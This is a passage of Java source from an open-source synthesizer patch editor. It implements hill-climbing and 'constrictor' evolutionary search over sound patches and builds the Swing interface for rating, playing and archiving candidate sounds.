shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } public static final double MUTATION_WEIGHT = 1.0; void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, c, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); // A + C currentModels[stage + 1] = a.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); // A + (B + C) currentModels[stage + 2] = a.copy().recombine(random, b.copy().recombine(random, c, keys, recombination), keys, recombination).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - C currentModels[stage + 4] = a.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 6] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C currentModels[stage + 7] = c.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { // A - Z currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 9] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - A currentModels[stage + 10] = c.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - C currentModels[stage + 11] = b.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - B currentModels[stage + 12] = c.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 13] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // C - Z currentModels[stage + 14] = c.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B + C currentModels[stage + 15] = b.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 5] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 7] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 9] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 10] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // (A - Z) + (B - Z) currentModels[stage + 11] = a.copy().opposite(random, oldA, keys, recombination, false).recombine(random, b.copy().opposite(random, oldA, keys, recombination, false), keys, recombination).mutate(random, keys, mutationWeight); // A currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 13] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 14] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A currentModels[stage + 0] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 3] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 7] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 9] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 10] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 11] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 13] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 14] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = a.copy().opposite(random, oldA, keys, recombination, false).opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void constrict() { int poolSize= (bigger.isSelected() ? NUM_CANDIDATES : STAGE_SIZE); // that is, 32 vs 16 Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("constrictrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end // Identify the individuals to replace and the ones to keep int numToReplace = 0; for(int i = 0; i < selected.length; i++) { if (!selected[i].isSelected()) numToReplace++; } int[] replace = new int[numToReplace]; int[] keep = new int[poolSize - numToReplace]; if (replace.length == 0 || keep.length == 0) return; int k = 0; int r = 0; for(int i = 0; i < poolSize; i++) { if (selected[i].isSelected()) keep[k++] = i; else replace[r++] = i; } pushStack(new int[] { -1, -1, -1 }, new Model[] { currentModels[NUM_CANDIDATES - 1], null, null }, getSelectedResults(), currentModels); operation = OPERATION_CONSTRICT; // Now replace the individuals for(int i = 0; i < replace.length; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(keep.length); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(keep.length); if (p2 != p1) break; } if (method.getSelectedIndex() == 1) { // our recombination works as follows: 50% of the time we'll do crossover with a 1/2 rate. Otherwise we'll do it with a 3/4 rate. double rate = CONSTRICT_RECOMBINATION_RATE; // recombine if (random.nextBoolean()) rate = 0.5; currentModels[replace[i]] = currentModels[keep[p1]].copy().recombine(random, currentModels[keep[p2]], keys, rate).mutate(random, keys, weight); } } // Move the new ones to the beginning Model[] old = (Model[])(currentModels.clone()); int count = 0; for(int i = 0; i < replace.length; i++) { currentModels[count++] = old[replace[i]]; } for(int i = 0; i < keep.length; i++) { currentModels[count++] = old[keep[i]]; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climb() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } Model oldA = topStack().parents[0]; if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], oldA); operation = OPERATION_CLIMB; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], oldA); operation = OPERATION_CLIMB; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]], oldA); operation = OPERATION_CLIMB; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climbNN() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]]); operation = OPERATION_CLIMB_NN; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]]); operation = OPERATION_CLIMB_NN; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produceNN(random, keys, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]]); operation = OPERATION_CLIMB_NN; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } }
edisyn/HillClimb.java
/*** Copyright 2017 by Sean Luke Licensed under the Apache License version 2.0 */ package edisyn; import edisyn.synth.*; import edisyn.nn.*; import edisyn.gui.*; import javax.swing.*; import javax.swing.event.*; import javax.swing.border.*; import java.awt.*; import java.awt.event.*; import java.util.*; import java.io.*; /*** Procedure: Menu -> Start Hill-Climb [or Menu -> Reset Hill-Climb if already started] Creates Hill-Climb Panel and Resets it to current patch Menu -> Stop Hill-Climb Deletes Hill-Climb Panel Each sound has: 1. Done (or Keep?) -> Deletes Hill-Climb Panel and sets current patch to this sound [probably requires double-check dialog panel] 2. Try -> Sends sound to current patch 3. Best / Second Best / Third Best The Panel also has: 1. Iterate 2. Rate 3. Backup Hill-Climbing variations ***/ public class HillClimb extends SynthPanel { // OPERATIONS public static final int OPERATION_SEED_FROM_PATCH = 0; public static final int OPERATION_SEED_FROM_MORPH = 1; public static final int OPERATION_SEED_FROM_NUDGE = 2; public static final int OPERATION_SEED_FROM_FOUR = 3; public static final int OPERATION_SEED_FROM_SIX = 4; public static final int OPERATION_SEED_FROM_LIBRARIAN = 100; public static final int OPERATION_CLIMB = 4; public static final int OPERATION_CONSTRICT = 5; public static final int OPERATION_CLIMB_NN = 6; // HILL CLIMBING AND CONSTRICTION RATES // Note that the mutation rates go 0...100 inclusive, ints public static final int INITIAL_HILL_CLIMB_RATE = 37; // roughly 5 when we do weight^3 public static final int INITIAL_CONSTRICT_RATE = 0; // Note that the recombination rates go 0.0...1.0 inclusive, doubles public static final double CLIMB_RECOMBINATION_RATE = 0.75; public static final double CONSTRICT_RECOMBINATION_RATE = 0.75; /// HILL CLIMBING STACK class State { Model[] parents; int[] parentIndices; boolean[] parentsSelected; Model[] children; int operation; } // The stack proper ArrayList stack = new ArrayList(); /// NUMBER OF CANDIDATE SOLUTIONS public static final int NUM_CANDIDATES = 32; /// Candidates are divided into STAGES of 16 each. The mutation/recombionation procedures use the stage to determine how much mutation to do public static final int STAGE_SIZE = 16; // Size of the archive. We might make this bigger later. public static final int ARCHIVE_SIZE = 6; // There are more models than candidates: #17 is the current Model public static final int NUM_MODELS = NUM_CANDIDATES + ARCHIVE_SIZE + 1; // models currently being played and displayed Model[] currentModels = new Model[NUM_MODELS]; // the most recent procedure performed (see OPERATIONS above) int operation; // The ratings buttons, in the form ratings[candidate][rating] JRadioButton[][] ratings = new JRadioButton[NUM_MODELS + 1][3]; // The selection checkboxes, in the form selected[candidate]. Note that the only candidates are the actual candidates, not archives etc. JCheckBox[] selected = new JCheckBox[NUM_CANDIDATES]; // The play buttons, in the form plays[candidate] PushButton[] plays = new PushButton[NUM_MODELS]; // An empty synth used to store the hillclimbing and constriction model parameters, // since they can't be stored in the regular synth. Blank blank; // "Iteration 123" Category iterations; // Which sound is currently scheduled to be playing in the regular iteration int currentPlay = 0; // Which sound, if any, is currently playing because the user interrupted the regular iteration by pressing the sound's play button. // If no such sound, this is -1 int temporaryPlay = -1; // Climb button PushButton climb; // Constrict button. Notice that this is different from Climb PushButton constrict; // Climb mutation weights LabelledDial hillClimbRate; // Constriction mutation weights. Notice that this is different from Climb LabelledDial constrictRate; // Retry button PushButton retry; // Reset button PushButton reset; // Back button PushButton back; // Bigger checkbox JCheckBox bigger; // Box holding the hillcimber button and dial VBox hillClimbBox; // Box holding the constrictor button and dial VBox constrictBox; // Box holding either the hillClimbBox or the constrictBox. Needs to be occasionally revalidated. VBox outerBox; // List of climbing methods JComboBox method; // First 16 candidates VBox extraCandidates1; // Next 16 candidates VBox extraCandidates2; // holds either extraCandidates1 or extraCandidates1 + extraCandidates2 VBox candidates; boolean startSoundsAgain = false; public static final int NO_MENU_BUTTON = -1; int menuButton = NO_MENU_BUTTON; public void setToCurrentPatch() { if (menuButton != NO_MENU_BUTTON) { currentModels[menuButton] = synth.getModel().copy(); currentPlay = menuButton; menuButton = NO_MENU_BUTTON; if (startSoundsAgain) { synth.doSendTestNotes(); startSoundsAgain = false; } } } State popStack() { if (stack.size() == 0) return null; else return (State)(stack.remove(stack.size() - 1)); } void pushStack(int[] parentIndices, Model[] parents, boolean[] parentsSelected, Model[] children) { State state = new State(); state.parents = new Model[parents.length]; state.parentIndices = new int[parents.length]; state.parentsSelected = new boolean[parentsSelected.length]; state.operation = operation; for(int i = 0; i < parents.length; i++) { state.parents[i] = copy(parents[i]); state.parentIndices[i] = parentIndices[i]; state.parentsSelected[i] = parentsSelected[i]; } for(int i = 0; i < parentsSelected.length; i++) { state.parentsSelected[i] = parentsSelected[i]; } state.children = new Model[children.length]; for(int i = 0; i < children.length; i++) { state.children[i] = copy(children[i]); } stack.add(state); } State topStack() { if (stack.size() == 0) return null; else return (State)(stack.get(stack.size() - 1)); } boolean stackEmpty() { return (stack.size() == 0); } boolean stackInitial() { return (stack.size() == 1); } String titleForButton(int _i) { return "Play " + (_i < 16 ? (char)('a' + _i) : (_i < NUM_CANDIDATES ? (char)('A' + (_i - 16)) : (_i < NUM_MODELS - 1 ? (char)('q' + (_i - NUM_CANDIDATES)) : 'z'))); } VBox buildCandidate(int i) { final int _i = i; VBox vbox = new VBox(); plays[_i] = new PushButton(titleForButton(i)) { public void perform() { if (synth.isSendingTestNotes()) { temporaryPlay = _i; } else { for(int j = 0; j < NUM_MODELS; j++) { plays[j].getButton().setForeground(new JButton().getForeground()); plays[j].getButton().setText(titleForButton(j)); } plays[_i].getButton().setForeground(Color.RED); plays[_i].getButton().setText("<HTML><B>" + titleForButton(_i) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. Model backup = synth.model; synth.model = currentModels[_i]; synth.sendAllParameters(); synth.doSendTestNote(); synth.model = backup; temporaryPlay = _i; } } }; plays[i].getButton().setFocusable(false); vbox.add(plays[i]); HBox hh = new HBox(); VBox vv = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][0] = new JRadioButton("1")); ratings[i][0].setFocusable(false); ratings[i][0].setForeground(Style.TEXT_COLOR()); ratings[i][0].setFont(Style.SMALL_FONT()); ratings[i][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][0].setOpaque(false); // for windows vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][1] = new JRadioButton("2")); ratings[i][1].setFocusable(false); ratings[i][1].setForeground(Style.TEXT_COLOR()); ratings[i][1].setFont(Style.SMALL_FONT()); ratings[i][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][1].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][2] = new JRadioButton("3")); ratings[i][2].setFocusable(false); ratings[i][2].setForeground(Style.TEXT_COLOR()); ratings[i][2].setFont(Style.SMALL_FONT()); ratings[i][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][2].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); hh.add(vv); vv = new VBox(); if (i < NUM_CANDIDATES) { selected[i] = new JCheckBox(""); selected[i].setFocusable(false); selected[i].setForeground(Style.TEXT_COLOR()); selected[i].setOpaque(false); // for windows selected[i].setFont(Style.SMALL_FONT()); selected[i].setSelected(true); selected[i].putClientProperty("JComponent.sizeVariant", "small"); vv.add(selected[i]); } hh.add(vv); vbox.add(hh); JMenuItem[] doItems = new JMenuItem[17]; doItems[0] = new JMenuItem("Keep Patch"); doItems[0].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { // Keep for sure? //if (synth.showSimpleConfirm("Keep Patch", "Load Patch into Editor?")) { synth.tabs.setSelectedIndex(0); synth.setSendMIDI(false); // push to undo if they're not the same if (!currentModels[_i].keyEquals(synth.getModel())) synth.undo.push(synth.getModel()); // Load into the current model currentModels[_i].copyValuesTo(synth.getModel()); synth.setSendMIDI(true); synth.sendAllParameters(); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[0].setEnabled(false); doItems[1] = new JMenuItem("Edit in New Editor"); doItems[1].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Synth newSynth = synth.doDuplicateSynth(); // Copy the parameters forward into the synth, then // link the synth's model back to currentModels[_i]. // We do this because the new synth's widgets are registered // with its model, so we can't just replace the model. // But we can certainly replace currentModels[_i]! newSynth.setSendMIDI(false); currentModels[_i].copyValuesTo(newSynth.getModel()); newSynth.setSendMIDI(true); currentModels[_i] = newSynth.getModel(); newSynth.sendAllParameters(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[1].setEnabled(false); doItems[2] = new JMenuItem("Save to File"); doItems[2].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.doSaveAs("" + stack.size() + "." + (_i < NUM_CANDIDATES ? (_i + 1) : ("A" + (_i - NUM_CANDIDATES + 1))) + "." + synth.getPatchName(synth.getModel()) + ".syx"); synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[2].setEnabled(false); doItems[3] = null; doItems[4] = new JMenuItem("Request Current Patch"); doItems[4].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receiveCurrent.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestCurrentPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Current Patch", "This synthesizer does not support requesting the current patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[4].setEnabled(false); doItems[5] = new JMenuItem("Request Patch..."); doItems[5].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receivePatch.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Patch", "This synthesizer does not support requesting a patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[5].setEnabled(false); doItems[6] = new JMenuItem("Load from File..."); doItems[6].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.setShowingLimitedBankSysex(true); synth.doOpen(false); synth.setShowingLimitedBankSysex(false); currentModels[_i] = synth.model; synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[6].setEnabled(false); doItems[7] = new JMenuItem("Copy from Morph"); doItems[7].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { synth.setSendMIDI(false); synth.morph.current.copyValuesTo(currentModels[_i]); synth.setSendMIDI(true); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[7].setEnabled(false); doItems[8] = null; doItems[9] = new JMenuItem("Nudge Candidates to Me"); doItems[9].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Random random = synth.random; String[] keys = synth.getMutationKeys(); for(int i = 0; i < NUM_CANDIDATES; i++) { if (i == _i) continue; currentModels[i].recombine(random, currentModels[_i], keys, synth.nudgeRecombinationWeight).mutate(random, keys, synth.nudgeMutationWeight); } } }); doItems[10] = null; doItems[11] = new JMenuItem("Archive to q"); doItems[11].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 0] = (Model)(currentModels[_i].clone()); } }); doItems[12] = new JMenuItem("Archive to r"); doItems[12].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 1] = (Model)(currentModels[_i].clone()); } }); doItems[13] = new JMenuItem("Archive to s"); doItems[13].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 2] = (Model)(currentModels[_i].clone()); } }); doItems[14] = new JMenuItem("Archive to t"); doItems[14].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 3] = (Model)(currentModels[_i].clone()); } }); doItems[15] = new JMenuItem("Archive to u"); doItems[15].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 4] = (Model)(currentModels[_i].clone()); } }); doItems[16] = new JMenuItem("Archive to v"); doItems[16].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 5] = (Model)(currentModels[_i].clone()); } }); PushButton options = new PushButton("Options", doItems); options.getButton().setFocusable(false); vbox.add(options); return vbox; } public HillClimb(final Synth synth) { super(synth); method = new JComboBox(synth instanceof ProvidesNN ? new String[] { "Hill-Climber", "Constrictor", "NN Hill-Climber" } : new String[] { "Hill-Climber", "Constrictor" }); blank = new Blank(); addAncestorListener ( new AncestorListener () { public void ancestorAdded ( AncestorEvent event ) { requestFocusInWindow(); } public void ancestorRemoved ( AncestorEvent event ) { // will get removed } public void ancestorMoved ( AncestorEvent event ) { // don't care } } ); setFocusable(true); addKeyListener(new KeyListener() { public void keyPressed(KeyEvent e) { } public void keyReleased(KeyEvent e) { } public void keyTyped(KeyEvent e) { char c = e.getKeyChar(); if (c >= 'a' && c <= 'p') { int p = (int)(c - 'a'); plays[p].perform(); } else if (c >= 'A' && c <= 'P' && NUM_CANDIDATES == 32) { int p = (int)(c - 'A' + 16); plays[p].perform(); } else if ((c >= 'q' && c <= 'v')) { int p = (int)(c - 'q' + NUM_CANDIDATES); plays[p].perform(); } else if (c =='z') { int p = (int)(NUM_MODELS - 1); plays[p].perform(); } else if (c == ' ') { climb.perform(); } else if (c == KeyEvent.VK_BACK_SPACE) { back.perform(); } else if (c == KeyEvent.VK_ENTER) { retry.perform(); } else if (c >= '1' && c <= '3') { ratings[lastPlayedSound()][(int)(c - '1')].setSelected(true); } } }); ButtonGroup one = new ButtonGroup(); ButtonGroup two = new ButtonGroup(); ButtonGroup three = new ButtonGroup(); VBox top = new VBox(); HBox toprow = new HBox(); add(top, BorderLayout.CENTER); // add globals Category panel = new Category(null, "Iteration 1", Style.COLOR_GLOBAL()); iterations = panel; HBox iterationsBox = new HBox(); VBox vbox = new VBox(); // has to be first so others can have their size based on it back = new PushButton("Back Up") { public void perform() { pop(); resetCurrentPlay(); } }; back.getButton().setFocusable(false); outerBox = new VBox(); iterationsBox.add(outerBox); hillClimbBox = new VBox(); climb = new PushButton("Climb") { public void perform() { if (method.getSelectedIndex() == 2) // NN Climb { climbNN(); } else { climb(); } resetCurrentPlay(); } }; climb.getButton().setPreferredSize(back.getButton().getPreferredSize()); climb.getButton().setFocusable(false); hillClimbBox.add(climb); String s = synth.getLastX("HillClimbRate", synth.getClass().getName()); hillClimbRate = new LabelledDial("Mutation Rate", blank, "hillclimbrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "HillClimbRate", synth.getClass().getName()); } }; int v = INITIAL_HILL_CLIMB_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_HILL_CLIMB_RATE; hillClimbRate.setState(v); blank.getModel().set("hillclimbrate", v); hillClimbBox.add(hillClimbRate); constrictBox = new VBox(); constrict = new PushButton("Constrict") { public void perform() { constrict(); resetCurrentPlay(); } }; constrict.getButton().setPreferredSize(back.getButton().getPreferredSize()); constrict.getButton().setFocusable(false); constrictBox.add(constrict); s = synth.getLastX("ConstrictRate", synth.getClass().getName()); // we don't do this one anyway constrictRate = new LabelledDial("Mutation Rate", blank, "constrictrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = 